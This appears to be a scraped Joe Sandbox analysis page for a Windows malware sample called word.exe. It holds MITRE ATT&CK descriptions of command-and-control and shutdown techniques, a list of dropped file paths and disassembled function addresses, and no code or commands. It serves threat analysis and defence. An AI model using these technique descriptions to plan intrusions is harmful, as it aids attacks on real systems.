Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report word.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Setup.ini

C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe

C:\Users\user\AppData\Local\Temp\nsh912A.tmp

C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll

C:\Users\user\spherosome\preadoption\preembodiment\Himlede\heracleum.txt

C:\Users\user\spherosome\preadoption\preembodiment\Himlede\tilfrte.pro

C:\Users\user\spherosome\preadoption\preembodiment\Himlede\twiddle.une

C:\Users\user\spherosome\preadoption\preembodiment\Motived.Bje

C:\Users\user\spherosome\preadoption\preembodiment\Skankebens.ans

C:\Users\user\spherosome\preadoption\preembodiment\Unending.die

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
word.exe

Function 00403217 Relevance: 80.8, APIs: 27, Strings: 19, Instructions: 337
stringfilecomCOMMON

Function 00405D13 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Function 004055B1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Function 00403787 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00402C79 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
COMMON

Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Function 004059B1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Function 0040303A Relevance: 6.1, APIs: 4, Instructions: 108
fileCOMMON